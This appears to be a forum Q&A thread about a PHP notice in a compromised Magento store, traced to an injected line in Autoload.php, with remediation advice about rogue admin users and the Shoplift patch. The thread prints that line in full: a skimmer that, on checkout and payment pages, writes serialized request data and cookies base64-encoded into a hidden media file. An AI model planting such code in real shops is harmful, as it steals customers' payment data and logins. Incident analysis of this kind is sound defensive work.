magento - Mage PHP Notice: Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1 -

since morning i'm getting following php notice after running magento cronjob:

undefined index: request_uri in /htdocs/lib/varien/autoload.php on line 1

i did not modify of mage files.. how possible?

edit: i've edited autoload.php first check if request_uri set.


<?php if(preg_match("/checkout|payment/", $_server["request_uri"])) 


<?php if(isset($_server["request_uri"]) && preg_match("/checkout|payment/", $_server["request_uri"])) 

edit 30-04-2015:

after reading @volkan , comments i've replaced specified page original 1 magento , line indeed not present!.

the following malicious line present in autoload.php

<?php if(preg_match("/checkout|payment/", $_server["request_uri"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_request)."--".serialize($_cookie)). ":", file_append); }?> 

i've checked:

  • /js/index.php same original
  • /index.php same original
  • magpleasure_filesystem module not present

however.. there 2 new admin-users had obscure names:

  • backup - <-- domain leads domain holding page , email gives russian results on google
  • database -

both users have been deleted. website vulnerable tot shoplift exploit (which addressed in latest security-patch)

we're busy installing latest security patches.

it seems has been recent problem:

100,000 web shops open compromise attackers exploit magento bug magento shoplift bug tester v1.0

thanks users there help.

it looks page has been compromised, replace file original one, , install security patches magento. check if there new admin-users in backend, , module magpleasure_filesystem

check /js/index.php /index.php
